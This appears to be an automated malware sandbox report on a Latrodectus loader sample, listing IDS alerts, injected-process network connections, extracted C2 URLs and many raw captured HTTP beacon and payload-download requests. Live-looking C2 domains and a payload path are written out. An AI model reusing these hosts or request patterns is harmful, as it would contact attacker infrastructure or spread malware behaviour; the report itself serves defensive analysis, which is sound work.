Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50035 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50024 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49934 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50034 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49907 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50038 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50020 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50027 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50016 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50004 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50012 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50029 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50031 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50022 -> 172.67.217.190:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.217.190 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 94.232.43.224 6542	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://reateberam.com/test/
Source: Malware configuration extractor	URLs: https://dogirafer.com/test/

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 103.57.249.207:6542
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 94.232.43.224:6542

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN
Source: Joe Sandbox View	ASN Name: WELLWEBNL WELLWEBNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49907 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49916 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49928 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49934 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49941 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49962 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49968 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49972 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49980 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49986 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49995 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49999 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50000 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50003 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50004 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50010 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50008 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50006 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50002 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50009 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50013 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50012 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50023 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50020 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50024 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50021 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50026 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50030 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50027 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50035 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50029 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50031 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50022 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50028 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50018 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50017 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50037 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50039 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50034 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50033 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50036 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50038 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50025 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50019 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49934 -> 172.67.217.190:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12232Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
